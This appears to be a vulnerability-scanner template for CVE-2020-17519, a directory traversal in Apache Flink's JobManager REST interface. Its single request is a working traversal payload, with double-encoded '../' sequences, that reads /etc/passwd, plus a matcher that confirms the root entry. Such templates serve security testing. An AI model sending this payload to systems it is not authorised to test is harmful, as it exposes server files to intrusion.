24 lines
741 B
YAML
24 lines
741 B
YAML
id: CVE-2020-17519
|
|
|
|
info:
|
|
name: Apache Flink directory traversal
|
|
author: pd-team
|
|
severity: high
|
|
description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
|
|
|
|
# Source: https://github.com/B1anda0/CVE-2020-17519
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body
|